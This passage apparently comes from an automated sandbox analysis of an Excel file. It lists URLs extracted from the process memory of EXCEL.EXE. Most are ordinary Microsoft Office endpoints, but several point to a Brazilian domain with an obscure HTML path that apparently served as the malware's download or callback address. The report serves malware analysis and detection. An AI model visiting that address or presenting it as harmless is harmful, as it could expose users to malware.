      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://officeapps.live.com
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com%
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com)
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com/
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com3
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com5
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com9
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com=
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comC
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comG
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comM
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comQ
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comS
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comW
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comX(
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.coma
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.come
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comk
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.como
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comu
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/u
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdatedh
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://onedrive.live.com
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseUN
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://onedrive.live.com/embed?
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?i
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comed
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://osi.office.net
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netM&
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netjY
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://otelrules.azureedge.net
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://otelrules.azureedge.netd
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://outlook.office.com
      Source: EXCEL.EXE, 00000001.00000003.488654985.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.475934601.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467719465.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461793870.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.489721327.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610610633.000000000FD75000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://outlook.office.com/
      Source: EXCEL.EXE, 00000001.00000003.340165432.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.476324827.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488905407.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.462619600.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610948124.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490100931.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467872426.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420012413.000000000FE6F000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comX:
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://outlook.office365.com
      Source: EXCEL.EXE, 00000001.00000003.488654985.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.475934601.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467719465.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461793870.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.489721327.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610610633.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://outlook.office365.com/
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json3
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxI
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.340165432.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.476324827.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488905407.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.462619600.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610948124.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490100931.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467872426.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420012413.000000000FE6F000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000001.00000003.462703099.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.612583630.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418614920.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324846454.00000000167D3000.00000004.00000001.sdmpString found in binary or memory: https://playsis.c
      Source: EXCEL.EXE, 00000001.00000003.462703099.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.612583630.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418614920.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324846454.00000000167D3000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com
      Source: EXCEL.EXE, 00000001.00000003.462703099.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.612583630.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418614920.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324846454.00000000167D3000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.b
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/R
      Source: EXCEL.EXE, 00000001.00000003.462703099.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.612583630.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418614920.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324846454.00000000167D3000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSL1B
      Source: EXCEL.EXE, 00000001.00000002.611442721.00000000136D7000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSL1BN5V/tiynh.html
      Source: EXCEL.EXE, 00000001.00000003.462703099.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.612583630.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418614920.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324846454.00000000167D3000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSL1BN5V/tiynh.htmlvn/TSh7GBeIR/tiynh.html
      Source: EXCEL.EXE, 00000001.00000003.462703099.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.612583630.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418614920.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324846454.00000000167D3000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSL1BNs
      Source: EXCEL.EXE, 00000001.00000003.462703099.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.612583630.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418614920.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324846454.00000000167D3000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSL1n
      Source: EXCEL.EXE, 00000001.00000003.462703099.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.612583630.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418614920.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324846454.00000000167D3000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qJSh
      Source: EXCEL.EXE, 00000001.00000003.462703099.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.612583630.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418614920.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324846454.00000000167D3000.00000004.00000001.sdmpString found in binary or memory: https://playsis.com.br/qt
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13db8
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://powerlift.acompli.net
